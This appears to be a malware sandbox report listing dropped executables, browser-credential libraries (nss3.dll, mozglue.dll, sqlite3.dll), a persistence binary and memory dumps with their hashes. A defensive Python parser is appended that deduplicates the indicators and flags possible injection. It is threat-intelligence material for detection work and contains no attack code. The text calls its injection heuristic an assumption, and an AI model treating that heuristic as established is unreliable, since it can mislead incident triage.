| SHA512 | d10962a7c0027ca5dafda2e9ebc236b04284c4542f65e3cea9ec423b29012ed7fc111579e73f0b46d6e3be0ed020dc23c784c5f281abcf02071cfd904fdf1ab5 |
memory/5024-147-0x0000000000780000-0x00000000007B0000-memory.dmp
memory/5024-148-0x0000000000400000-0x0000000000460000-memory.dmp
memory/5024-149-0x00000000021A0000-0x00000000021BF000-memory.dmp
memory/5024-150-0x0000000004940000-0x0000000004941000-memory.dmp
memory/5024-151-0x0000000004E90000-0x0000000004EAE000-memory.dmp
memory/4100-153-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\3C5B.exe
| MD5 | 896c7cca8317b58fc449155ea1272121 |
| SHA1 | b860f4e8e49b2c446d2b85a3e8b236e583c0ec1e |
| SHA256 | d565d2c479fd0cb15d644f82ead1c64173f67e5b6dabcde7a215010c894a607c |
| SHA512 | a32a30c6cdab14e0f249512db27cab391e62364b8f9fb099cf6be5b159906012f2fb8128d6d310b4ec6373354c98f9a140c448479fe86ed03ed0fff051f8326a |
memory/5024-160-0x0000000002170000-0x0000000002171000-memory.dmp
memory/5024-161-0x0000000002172000-0x0000000002173000-memory.dmp
memory/5024-163-0x0000000002174000-0x0000000002176000-memory.dmp
memory/5024-162-0x0000000002173000-0x0000000002174000-memory.dmp
memory/4784-164-0x0000000006A30000-0x0000000006A31000-memory.dmp
memory/4784-165-0x0000000007130000-0x0000000007131000-memory.dmp
memory/4784-166-0x0000000006C00000-0x0000000006C01000-memory.dmp
memory/4784-168-0x0000000006E10000-0x0000000006E11000-memory.dmp
memory/4784-169-0x0000000006F30000-0x0000000006F31000-memory.dmp
memory/4100-170-0x00000000009D0000-0x0000000000A60000-memory.dmp
memory/4100-171-0x0000000000400000-0x0000000000493000-memory.dmp
memory/4784-172-0x0000000006FD0000-0x0000000006FD1000-memory.dmp
\Users\Admin\AppData\LocalLow\sqlite3.dll
| MD5 | f964811b68f9f1487c2b41e1aef576ce |
| SHA1 | b423959793f14b1416bc3b7051bed58a1034025f |
| SHA256 | 83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7 |
| SHA512 | 565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4 |
memory/4128-174-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\48FE.exe
| MD5 | fbe52cb1e8984491597e95d1be29b921 |
| SHA1 | 2e46c6964739e2de11b1be7d7666738d28021a76 |
| SHA256 | fad3d5106b87c610a2203218a84d3a74469da11818882ea9a7d75f001ca639a3 |
| SHA512 | 1675d8ec937e24debd9638ad53e98ea23a71b9e5483538c1d731ca8c21e055fd07decf5d0d7f4d544efecfbe6827821f82ce0b63dffc05270e274b784fad03d2 |
memory/4128-177-0x0000000077DF0000-0x0000000077F7E000-memory.dmp
memory/4128-179-0x0000000000D50000-0x0000000000D51000-memory.dmp
memory/4128-193-0x0000000005550000-0x0000000005551000-memory.dmp
memory/4448-194-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\512D.exe
| MD5 | 66a44c759def3503e2ebfabca517cfa0 |
| SHA1 | ca4bf41eec17ba26831cf61fcf0cec4c306a8f4b |
| SHA256 | c0a67126590124954c0a73f103b9f1f04d0aee8b4df2968f124a801b7cdf87fe |
| SHA512 | ae8d879e313aa2813144c55538fef04d60d282e8de0dc12f8ef04068d3bc69e83ba2073028706f882a7bd2df8819c3bd5b5435009bd363864644b8ccb220e360 |
\Users\Admin\AppData\LocalLow\uS0wV5wY9qH3\nss3.dll
| MD5 | 02cc7b8ee30056d5912de54f1bdfc219 |
| SHA1 | a6923da95705fb81e368ae48f93d28522ef552fb |
| SHA256 | 1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5 |
| SHA512 | 0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5 |
\Users\Admin\AppData\LocalLow\uS0wV5wY9qH3\mozglue.dll
| MD5 | eae9273f8cdcf9321c6c37c244773139 |
| SHA1 | 8378e2a2f3635574c106eea8419b5eb00b8489b0 |
| SHA256 | a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc |
| SHA512 | 06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097 |
memory/4784-199-0x00000000070E0000-0x00000000070E1000-memory.dmp
memory/4448-207-0x0000000002500000-0x00000000025D2000-memory.dmp
memory/4448-208-0x0000000000400000-0x0000000000563000-memory.dmp
memory/4488-209-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5B50.exe
| MD5 | a8386e3c88de25a8f904fdfa69daac69 |
| SHA1 | 017860c60d4ba68e2a16243804088f79d246055d |
| SHA256 | 09b828682642001d90e518edc46110245320f0e69c99a9e2733ca4818614b2d1 |
| SHA512 | 68c77c76f61808fa2baa5f76f61315a12987bf7b277afc75f8d5dde0f4d315f524d1d157fd435fd24cb4d4fb050ce55947eca2696b4168c7340912b1c43d4b9c |
memory/4488-212-0x0000000000B40000-0x0000000000B41000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\6023.exe
| MD5 | 922f4c38e12bd2de4922322c2b4e41ab |
| SHA1 | 4e0d25705cfba043fefbaaadebedbb3836220aa6 |
| SHA256 | 4d5dd2f34ad1fc1c1930097678e16d11a8753b36279f5531b1b6f0a4fd3288ba |
| SHA512 | 239cde5d1a89ef36b6a392170a24489e248dcaaff1b108bf1611121bcfd746d8c97a27caae1d513f0815e23c8e2eae3b7cdb88b35335971255490ae6c95362f2 |
memory/4600-219-0x0000000000000000-mapping.dmp
memory/4600-222-0x0000000000110000-0x0000000000111000-memory.dmp
memory/4488-225-0x00000000034C0000-0x00000000034C1000-memory.dmp
memory/4488-223-0x0000000077DF0000-0x0000000077F7E000-memory.dmp
memory/4600-229-0x0000000002420000-0x0000000002421000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\6B21.exe
| MD5 | 8cb90073d09036b3732ac02b912cdf91 |
| SHA1 | 17182316980a955f085c7ff74d7442709b6cc62f |
| SHA256 | 32950322c0e9d0581faea99fdf06703ef6e0c1eab9ef2a720c400ef69e036b09 |
| SHA512 | ed9f27ec50fd1aad40c90a31b11fa67214f94eb7216ee936b8ef25bc18907f773088c5b961421f8d902ecc7c3f5559a6e3326d54ae898eb4d19548cd4031a29f |
memory/616-238-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6B21.exe
| MD5 | 8cb90073d09036b3732ac02b912cdf91 |
| SHA1 | 17182316980a955f085c7ff74d7442709b6cc62f |
| SHA256 | 32950322c0e9d0581faea99fdf06703ef6e0c1eab9ef2a720c400ef69e036b09 |
| SHA512 | ed9f27ec50fd1aad40c90a31b11fa67214f94eb7216ee936b8ef25bc18907f773088c5b961421f8d902ecc7c3f5559a6e3326d54ae898eb4d19548cd4031a29f |
memory/616-246-0x0000000005600000-0x0000000005601000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\6023.exe
| MD5 | 922f4c38e12bd2de4922322c2b4e41ab |
| SHA1 | 4e0d25705cfba043fefbaaadebedbb3836220aa6 |
| SHA256 | 4d5dd2f34ad1fc1c1930097678e16d11a8753b36279f5531b1b6f0a4fd3288ba |
| SHA512 | 239cde5d1a89ef36b6a392170a24489e248dcaaff1b108bf1611121bcfd746d8c97a27caae1d513f0815e23c8e2eae3b7cdb88b35335971255490ae6c95362f2 |
memory/1192-248-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6F48.exe
| MD5 | 5a69e2f5e30d05abb8b5367aba095f4c |
| SHA1 | 8cea80c4135c54e831c3751e6b25d8ceb2720703 |
| SHA256 | 854d953d7bc8a95f98e238c9499cae881e8ca8d32020527f7a297a708aeb7ac3 |
| SHA512 | dc0ec0cf9392c720c6634e3ebac6b7f8e20800f4fc3e6f9110628efa7019ace21d30a61a2c98f03b121bc55a665175ad97dad96e7e43a1d61d8cb1051a11dbd7 |
C:\Users\Admin\AppData\Local\Temp\6F48.exe
| MD5 | 5a69e2f5e30d05abb8b5367aba095f4c |
| SHA1 | 8cea80c4135c54e831c3751e6b25d8ceb2720703 |
| SHA256 | 854d953d7bc8a95f98e238c9499cae881e8ca8d32020527f7a297a708aeb7ac3 |
| SHA512 | dc0ec0cf9392c720c6634e3ebac6b7f8e20800f4fc3e6f9110628efa7019ace21d30a61a2c98f03b121bc55a665175ad97dad96e7e43a1d61d8cb1051a11dbd7 |
memory/1488-251-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\6FED.bat
| MD5 | 23e71d6fea8aa3a5b563b3d6f3eb6a8d |
| SHA1 | a84dd72ec8513ed7891eb1f31259379b835229d6 |
| SHA256 | 957938e9c0d901f9e96e36e04fc6a8e250808725559c406cf53573554ad129ad |
| SHA512 | 199ef9a30e4d11e9e584d9c50d348d8ff5266c50c59e8eae3149c99dcddde03371f0a464c547e95aef8e03e1ee8db5985e103bd0f6218af42fa67c2dc89ab093 |
memory/1588-253-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe
| MD5 | b019efc4814c7a73b1413a335be1fa13 |
| SHA1 | 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2 |
| SHA256 | a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e |
| SHA512 | d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b |
C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe
| MD5 | b019efc4814c7a73b1413a335be1fa13 |
| SHA1 | 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2 |
| SHA256 | a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e |
| SHA512 | d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b |
C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe
| MD5 | b019efc4814c7a73b1413a335be1fa13 |
| SHA1 | 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2 |
| SHA256 | a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e |
| SHA512 | d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b |
memory/1952-256-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\21598\33.exe
| MD5 | a6a676051f857d516f6c4bec595a7cfb |
| SHA1 | 10e7c48a109ffbe60fa7ab3585c4bd711942cbd2 |
| SHA256 | 98686e602b5f75bbceb801ca315617579ad9ffe9e2df66d49673ea35a7e1f343 |
| SHA512 | df302b28e5897bac668ad1ae2b32d2424af7c8cdf4527ac54ea268e6e9fbf41efe28b236af25ceacb5e5acd95b6c99b8cf95fa735687358a265bd59e2b127ba6 |
memory/2132-259-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\21598\PLQRfphz.exe
| MD5 | 5aeb767b510b7f98e34bacfb48ad6aee |
| SHA1 | c76d2a201687988213bf097e07db45a840131025 |
| SHA256 | a354c672e502b1f84041b96c0db87f9f63868908ab01a9d993476854de4834a7 |
| SHA512 | 0f07af063e61a0b5651c1a1fbd12e776e8f9c7725c893b11bffb3e54f5eb3cd71ced4a37caac512b3a028157e886338ff6e42a8fd3f8c11c649b0afeb251914b |
memory/2248-261-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\21598\PLQRfphz.exe
| MD5 | 5aeb767b510b7f98e34bacfb48ad6aee |
| SHA1 | c76d2a201687988213bf097e07db45a840131025 |
| SHA256 | a354c672e502b1f84041b96c0db87f9f63868908ab01a9d993476854de4834a7 |
| SHA512 | 0f07af063e61a0b5651c1a1fbd12e776e8f9c7725c893b11bffb3e54f5eb3cd71ced4a37caac512b3a028157e886338ff6e42a8fd3f8c11c649b0afeb251914b |
C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe
| MD5 | b019efc4814c7a73b1413a335be1fa13 |
| SHA1 | 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2 |
| SHA256 | a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e |
| SHA512 | d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b |
C:\Users\Admin\AppData\Local\Temp\745A.exe
| MD5 | c8d4b455187ceb42f74d7786911a37ea |
| SHA1 | 350fc1dbface497fe660ecde0194d8b5b34dfcf5 |
| SHA256 | 40e766ae6379c7b1e8cace0538a16db203c26bd6a84bab99fa79ee0dcc6abd4f |
| SHA512 | 5f1133ad01741ec6d367e1aaafbc962763b608c12502df224c488305d72caf75a84cbad7a45e9b342b4bee4289df012b0368a431869876f618cdf1e0ab21c0fd |
memory/2704-271-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\745A.exe
| MD5 | c8d4b455187ceb42f74d7786911a37ea |
| SHA1 | 350fc1dbface497fe660ecde0194d8b5b34dfcf5 |
| SHA256 | 40e766ae6379c7b1e8cace0538a16db203c26bd6a84bab99fa79ee0dcc6abd4f |
| SHA512 | 5f1133ad01741ec6d367e1aaafbc962763b608c12502df224c488305d72caf75a84cbad7a45e9b342b4bee4289df012b0368a431869876f618cdf1e0ab21c0fd |
memory/2132-276-0x0000000005190000-0x0000000005796000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\6B21.exe
| MD5 | 8cb90073d09036b3732ac02b912cdf91 |
| SHA1 | 17182316980a955f085c7ff74d7442709b6cc62f |
| SHA256 | 32950322c0e9d0581faea99fdf06703ef6e0c1eab9ef2a720c400ef69e036b09 |
| SHA512 | ed9f27ec50fd1aad40c90a31b11fa67214f94eb7216ee936b8ef25bc18907f773088c5b961421f8d902ecc7c3f5559a6e3326d54ae898eb4d19548cd4031a29f |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\6B21.exe.log
| MD5 | 41fbed686f5700fc29aaccf83e8ba7fd |
| SHA1 | 5271bc29538f11e42a3b600c8dc727186e912456 |
| SHA256 | df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437 |
| SHA512 | 234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034 |
memory/768-283-0x000000000041C5DE-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\6023.exe.log
| MD5 | 41fbed686f5700fc29aaccf83e8ba7fd |
| SHA1 | 5271bc29538f11e42a3b600c8dc727186e912456 |
| SHA256 | df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437 |
| SHA512 | 234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034 |
C:\Users\Admin\AppData\Local\Temp\6023.exe
| MD5 | 922f4c38e12bd2de4922322c2b4e41ab |
| SHA1 | 4e0d25705cfba043fefbaaadebedbb3836220aa6 |
| SHA256 | 4d5dd2f34ad1fc1c1930097678e16d11a8753b36279f5531b1b6f0a4fd3288ba |
| SHA512 | 239cde5d1a89ef36b6a392170a24489e248dcaaff1b108bf1611121bcfd746d8c97a27caae1d513f0815e23c8e2eae3b7cdb88b35335971255490ae6c95362f2 |
memory/1136-296-0x000000000041C606-mapping.dmp
memory/768-308-0x0000000004E60000-0x0000000005466000-memory.dmp
memory/1136-309-0x0000000005A10000-0x0000000006016000-memory.dmp
memory/4548-329-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\fl.exe
| MD5 | 7f34c12f88020dcc02f994529fb48222 |
| SHA1 | 41446495e7817e0d5eb2a1c51a7f0984b56d36f8 |
| SHA256 | 38582026970861e90f4f3f15da60fa5c8bc8759a2fab6c58a6c262d9096ac1e4 |
| SHA512 | c6373d56a0496f88d129bdf614e5ec063a7c02a84cfd8f37dd83208d3cfedce7de1cd534c25d3ffcb260c31f5792df7371fc795b152095c5a71eecd93bbdc5a9 |
C:\Users\Admin\AppData\Local\Temp\fl.exe
| MD5 | 7f34c12f88020dcc02f994529fb48222 |
| SHA1 | 41446495e7817e0d5eb2a1c51a7f0984b56d36f8 |
| SHA256 | 38582026970861e90f4f3f15da60fa5c8bc8759a2fab6c58a6c262d9096ac1e4 |
| SHA512 | c6373d56a0496f88d129bdf614e5ec063a7c02a84cfd8f37dd83208d3cfedce7de1cd534c25d3ffcb260c31f5792df7371fc795b152095c5a71eecd93bbdc5a9 |
memory/4536-333-0x0000000000000000-mapping.dmp
memory/4536-345-0x00000233F4580000-0x00000233F4582000-memory.dmp
memory/4536-346-0x00000233F4583000-0x00000233F4585000-memory.dmp
memory/4536-347-0x00000233F4586000-0x00000233F4588000-memory.dmp
memory/4536-392-0x00000233F4588000-0x00000233F4589000-memory.dmp
memory/1488-393-0x0000000000000000-mapping.dmp
C:\ProgramData\Systemd\dllhoster.exe
| MD5 | 4c03f40035bf018553157080f1b02671 |
| SHA1 | 86531b83d3b3317c9da5010357fd9b5fbfd2bebe |
| SHA256 | d1d89ada2bd812473633d6aee4a4e1154affda7d0a5f8e3bf76638701b8c16f9 |
| SHA512 | 9b20bd124fbce81e562f69c81903f54809ab10206b32b664b19862e8915093fe24a36b0095c3704fd89baca4a7f6fda01a8e3237b33be1efb82f5704080fa926 |
memory/1488-396-0x00000000001C0000-0x00000000001E0000-memory.dmp
memory/4172-397-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\199b1g.exe
| MD5 | 34e8b12f54a252b5a12eb025a5a4df73 |
| SHA1 | 8a012adea49ed6a856ca0de339bd56c505a3642c |
| SHA256 | 6cb5bef0a752e083ce24830cbd418201220fa6db6298d8f7e0cbd34d10903ac7 |
| SHA512 | db9228e8b2cfd49f4371c4aac1bac9787982399c575252910a5aa54e7246907ec4d0c85976f4e258e573ab6703d4c67b04bca59937f4e8e60504ddfa0994014b |
memory/4880-400-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\199b1g.exe
| MD5 | 34e8b12f54a252b5a12eb025a5a4df73 |
| SHA1 | 8a012adea49ed6a856ca0de339bd56c505a3642c |
| SHA256 | 6cb5bef0a752e083ce24830cbd418201220fa6db6298d8f7e0cbd34d10903ac7 |
| SHA512 | db9228e8b2cfd49f4371c4aac1bac9787982399c575252910a5aa54e7246907ec4d0c85976f4e258e573ab6703d4c67b04bca59937f4e8e60504ddfa0994014b |
memory/4976-405-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\test.exe
| MD5 | bdea822c8b1b29b67a9df071ebac5064 |
| SHA1 | 507a60469e99c73f4941d2cb1d827ccfcb6fe013 |
| SHA256 | 4f0f6d48fe06eefbfa03493b6984099ef6b9e1423d128e133a5e8e1353e4ecbd |
| SHA512 | 42c0c96b3da105bea5271baf02cb0bfa8a4b0704f1774383b19592e6e84bbd4a29b67f311151b2d5c36b334c484bf3a58aedaac33ff914b3cf68ef4b56d60de5 |
C:\Users\Admin\AppData\Local\Temp\test.exe
| MD5 | bdea822c8b1b29b67a9df071ebac5064 |
| SHA1 | 507a60469e99c73f4941d2cb1d827ccfcb6fe013 |
| SHA256 | 4f0f6d48fe06eefbfa03493b6984099ef6b9e1423d128e133a5e8e1353e4ecbd |
| SHA512 | 42c0c96b3da105bea5271baf02cb0bfa8a4b0704f1774383b19592e6e84bbd4a29b67f311151b2d5c36b334c484bf3a58aedaac33ff914b3cf68ef4b56d60de5 |
C:\Users\Admin\AppData\Local\Temp\SparestPeculation_2021-09-19_16-22.exe
| MD5 | 9dfcf7fcbab5aa6c1fdecb718f7840ea |
| SHA1 | c6e6043f50475555268124cda0c120f0911c1c38 |
| SHA256 | 953dd899dedad266fe3d21f1382bd96be78f051ff3d260926c250044a65d4d1d |
| SHA512 | 625358f1f7b4012dee0dd09a61abddf47ed830fcf1a065c7c092813546dc53dbfe65b8a7daec63e391cf6ed7505b04dfd252e7f69f332e86e3124efa8ca1d595 |
C:\Users\Admin\AppData\Local\Temp\SparestPeculation_2021-09-19_16-22.exe
| MD5 | 9dfcf7fcbab5aa6c1fdecb718f7840ea |
| SHA1 | c6e6043f50475555268124cda0c120f0911c1c38 |
| SHA256 | 953dd899dedad266fe3d21f1382bd96be78f051ff3d260926c250044a65d4d1d |
| SHA512 | 625358f1f7b4012dee0dd09a61abddf47ed830fcf1a065c7c092813546dc53dbfe65b8a7daec63e391cf6ed7505b04dfd252e7f69f332e86e3124efa8ca1d595 |
memory/2644-416-0x000000000041C5DA-mapping.dmp
memory/4880-417-0x000000001AE40000-0x000000001AE42000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\199b1g.exe
| MD5 | 34e8b12f54a252b5a12eb025a5a4df73 |
| SHA1 | 8a012adea49ed6a856ca0de339bd56c505a3642c |
| SHA256 | 6cb5bef0a752e083ce24830cbd418201220fa6db6298d8f7e0cbd34d10903ac7 |
| SHA512 | db9228e8b2cfd49f4371c4aac1bac9787982399c575252910a5aa54e7246907ec4d0c85976f4e258e573ab6703d4c67b04bca59937f4e8e60504ddfa0994014b |
memory/4172-415-0x0000000004CC0000-0x00000000051BE000-memory.dmp
memory/2644-427-0x0000000005760000-0x0000000005D66000-memory.dmp
memory/4792-428-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\7974777.scr
| MD5 | 87ab55c2316e05567d9c45f77028da15 |
| SHA1 | 8a159e4b3afda505bb1b4665b2be856d5804cfea |
| SHA256 | fc9887d5ba7add7ea1b487e58f0a5495adfe833cf1e75067edec2a1dce49df20 |
| SHA512 | 3fca98782e50c9a77ac93c8d934c36cd77612381884cc0fd913e255016998271b993819b841ba0bfc19f89cf0302d895d884158e8d776c8f85b61b03a0f0ad16 |
C:\Users\Admin\AppData\Roaming\7974777.scr
| MD5 | 87ab55c2316e05567d9c45f77028da15 |
| SHA1 | 8a159e4b3afda505bb1b4665b2be856d5804cfea |
| SHA256 | fc9887d5ba7add7ea1b487e58f0a5495adfe833cf1e75067edec2a1dce49df20 |
| SHA512 | 3fca98782e50c9a77ac93c8d934c36cd77612381884cc0fd913e255016998271b993819b841ba0bfc19f89cf0302d895d884158e8d776c8f85b61b03a0f0ad16 |
memory/4976-440-0x0000000000400000-0x0000000000460000-memory.dmp
memory/4976-442-0x0000000004C90000-0x0000000004C91000-memory.dmp
memory/4976-438-0x0000000000580000-0x00000000006CA000-memory.dmp
memory/4976-446-0x0000000004C92000-0x0000000004C93000-memory.dmp
memory/4976-448-0x0000000004C93000-0x0000000004C94000-memory.dmp
memory/4976-443-0x0000000004C94000-0x0000000004C96000-memory.dmp
memory/4792-452-0x0000000004970000-0x0000000004971000-memory.dmp
memory/1488-466-0x0000000001110000-0x0000000001130000-memory.dmp
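To turn a dropped-file listing like the one above into a deduplicated IOC set, here is an added Python example; it is not part of the report and not the sandbox vendor's own tooling. It parses the three line shapes visible in the listing (a path line, `| MD5 | ... |` hash rows, and `memory/<pid>-<seq>-0x...-{mapping,memory}.dmp` lines), collapses repeated entries by SHA256 (which makes visible, for instance, that `6023.exe` was written more than once and that the two CLR `UsageLogs\*.exe.log` entries have identical content), groups dumps per PID, and flags `-mapping.dmp` entries whose address is non-zero. The meaning given to that address (the point where a new thread started inside injected code, versus `0x0` for an ordinary process start) is an assumption of this example, not something the report states. The embedded `SAMPLE` is a subset copied from the listing above with the SHA512 rows left out for brevity.

```python
"""Parse a sandbox dropped-file / memory-dump listing into deduplicated IOCs.

Added example; not the report's own code.  Assumes the line shapes seen in the
listing: a bare path, "| <ALGO> | <hex> |" rows, and memory/... dump names.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional

HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
MEM_DUMP = re.compile(
    r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)(?:-0x([0-9A-Fa-f]+))?-(mapping|memory)\.dmp$"
)
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}


@dataclass
class DroppedFile:
    path: str
    hashes: Dict[str, str] = field(default_factory=dict)


@dataclass
class MemDump:
    pid: int
    seq: int
    start: int
    end: Optional[int]   # None for "-mapping.dmp" names, which carry one address
    kind: str            # "mapping" or "memory"


def parse_listing(text: str):
    """Return (files in listing order, memory dumps) for one report section."""
    files: List[DroppedFile] = []
    dumps: List[MemDump] = []
    current: Optional[DroppedFile] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEM_DUMP.match(line)
        if m:
            pid, seq, start, end, kind = m.groups()
            dumps.append(MemDump(int(pid), int(seq), int(start, 16),
                                 int(end, 16) if end else None, kind))
            current = None          # a dump line ends the current hash table
            continue
        m = HASH_ROW.match(line)
        if m:
            algo, digest = m.group(1), m.group(2).lower()
            if current is None:
                raise ValueError(f"hash row without a preceding path: {line}")
            if len(digest) != DIGEST_LEN[algo]:
                raise ValueError(f"{algo} digest has wrong length for {current.path}")
            current.hashes[algo] = digest
            continue
        current = DroppedFile(path=line)   # any other line starts a new artifact
        files.append(current)
    return files, dumps


def unique_by_sha256(files: List[DroppedFile]) -> Dict[str, dict]:
    """One record per SHA256: every path it was seen at and how often it was written."""
    seen: Dict[str, dict] = {}
    for f in files:
        sha = f.hashes.get("SHA256")
        if sha is None:
            continue
        entry = seen.setdefault(sha, {"paths": set(), "occurrences": 0,
                                      "md5": f.hashes.get("MD5")})
        entry["paths"].add(f.path)
        entry["occurrences"] += 1
    return seen


def dumps_by_pid(dumps: List[MemDump]) -> Dict[int, List[MemDump]]:
    by_pid = defaultdict(list)
    for d in dumps:
        by_pid[d.pid].append(d)
    return dict(by_pid)


def injected_entry_points(dumps: List[MemDump]):
    """(pid, address) for mapping dumps with a non-zero address.
    Assumption of this example: 0x0 marks an ordinary process start, while an
    address inside an image (e.g. 0x41C5DE) marks a thread started in injected code."""
    return [(d.pid, d.start) for d in dumps if d.kind == "mapping" and d.start != 0]


# Constructed sample: a subset of the listing above (SHA512 rows omitted).
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\6023.exe
| MD5 | 922f4c38e12bd2de4922322c2b4e41ab |
| SHA1 | 4e0d25705cfba043fefbaaadebedbb3836220aa6 |
| SHA256 | 4d5dd2f34ad1fc1c1930097678e16d11a8753b36279f5531b1b6f0a4fd3288ba |
memory/4600-219-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6023.exe
| MD5 | 922f4c38e12bd2de4922322c2b4e41ab |
| SHA1 | 4e0d25705cfba043fefbaaadebedbb3836220aa6 |
| SHA256 | 4d5dd2f34ad1fc1c1930097678e16d11a8753b36279f5531b1b6f0a4fd3288ba |
memory/4600-222-0x0000000000110000-0x0000000000111000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\6B21.exe.log
| MD5 | 41fbed686f5700fc29aaccf83e8ba7fd |
| SHA1 | 5271bc29538f11e42a3b600c8dc727186e912456 |
| SHA256 | df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437 |
memory/768-283-0x000000000041C5DE-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\6023.exe.log
| MD5 | 41fbed686f5700fc29aaccf83e8ba7fd |
| SHA1 | 5271bc29538f11e42a3b600c8dc727186e912456 |
| SHA256 | df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437 |
memory/768-308-0x0000000004E60000-0x0000000005466000-memory.dmp
"""

if __name__ == "__main__":
    files, dumps = parse_listing(SAMPLE)
    for sha, info in unique_by_sha256(files).items():
        print(sha, info["occurrences"], sorted(info["paths"]))
    print("dumps per pid:", {pid: len(v) for pid, v in dumps_by_pid(dumps).items()})
    print("non-zero mapping addresses:", [(p, hex(a)) for p, a in injected_entry_points(dumps)])
```

Run it against the full listing (paste the section into `SAMPLE` or read it from a file) to get the unique hash set for blocking and the per-PID dump inventory for triage; the `-mapping.dmp` flag only narrows which dumps to open first and should be confirmed by looking at the dump contents.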